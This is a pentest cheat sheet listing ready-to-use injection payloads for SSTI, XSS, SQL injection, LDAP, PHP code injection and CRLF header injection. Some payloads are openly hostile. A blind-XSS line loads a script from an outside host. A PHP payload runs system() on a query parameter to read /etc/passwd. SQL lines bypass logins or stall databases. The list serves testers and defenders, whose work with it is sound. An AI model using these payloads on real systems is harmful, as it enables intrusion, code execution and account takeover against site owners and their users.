Cheat sheet

SSTI (Server Side Template Injection)

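## Detection probes: 77*77 = 5929, so a response containing 5929 means the expression was evaluated; check that the evaluation happened server-side rather than in a client-side framework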
{{77*77}}%20${77*77}%20<%=77*77%>%20${{77*77}}%20#{77*77}%20*{77*77}%20[[77*77]]
${{<%[%'"}}%\.
{{77*77}}
${77*77}
<%= 77*77 %>
${{77*77}}
#{77*77}
*{77*77}
[[77*77]]

XSS Cross-Site Scripting

'"><img src=1 onerror=alert((document.domain))>//
'"><xss id=x onfocus=alert((document.domain)) tabindex=1>#x

## XSS between HTML tags
<script>alert((document.domain))</script>
<img src=1 onerror=alert((document.domain))>

## XSS in HTML tag attributes
/>"autofocus onfocus=alert((document.domain)) x="
## Inside an href attribute
javascript:alert((document.domain))

## XSS inside JavaScript
'-alert((document.domain))-'
';alert((document.domain))//-'
\';alert((document.domain))//-'
${alert(document.domain)}

## Bypass email filter
"><svg/onload=confirm(1)>"@gmail.com

## Blind XSS
'"></title></teXtarEa></scRipt></style></noscript><scRipt src=https://abc.xss.ht></scRipt>//

## Polyglots
-->'"/></sCript><svG x=">" onload=((co\u006efirm))``>

javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert((document.domain))//'>

javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*&lt;svg/*/onload=alert((document.domain))//>
 
javascript:/*--></title></style></textarea></script></xmp><details/open/ontoggle='+/`/+/"/+/onmouseover=1/+/[*/[]/+alert(/@1/)//'>

';alert(String.fromCharCode(88,83,83))//';alert(String. fromCharCode(88,83,83))//";alert(String.fromCharCode (88,83,83))//";alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83)) </SCRIPT>

">><marquee><img src=x onerror=confirm(1)></marquee>" ></plaintext\></|\><plaintext/onmouseover=prompt(1) ><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->" ></script><script>alert(1)</script>"><img/id="confirm&lpar; 1)"/alt="/"src="/"onerror=eval(id&%23x29;>'"><img src="http: //i.imgur.com/P8mL8.jpg">

SQL Injection

' or 1=1 -- -
admin' --
admin'/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
admin' or '1'='1'/*

'; WAITFOR DELAY '0:0:10' --
'; SELECT pg_sleep(10) --
'; SELECT SLEEP(10) --+
' dbms_pipe.receive_message(('a'),10) --

## Polyglots
SLEEP(5) /*' or SLEEP(5) or '" or SLEEP(5) or "*/

## SQLi / JS inject / html inject / CSTI Injection
'"`><img src=x>${{7*7}}

LDAP Injection

*
*)(&
//
@*
|
admin*
admin*)((|password=*)

PHP Code Injection

{${sleep(hexdec(dechex(20)))}}
${system($_GET[1])}&1=cat+/etc/passwd
${system(chr(105).chr(100))}                // chr(105).chr(100) is "id", i.e. system("id")

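CRLF Injection

## %0D%0A is URL-encoded CR LF; %E5%98%8A and %E5%98%8D are the UTF-8 encodings of U+560A and U+560D, which some stacks truncate to the bytes 0x0A and 0x0D. Values written into response headers should be checked for CR/LF after all decoding.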

%0D%0A
%E5%98%8A%E5%98%8D

%0D%0ASet-Cookie:mycookie=myvalue
%E5%98%8A%E5%98%8DSet-Cookie:mycookie=myvalue
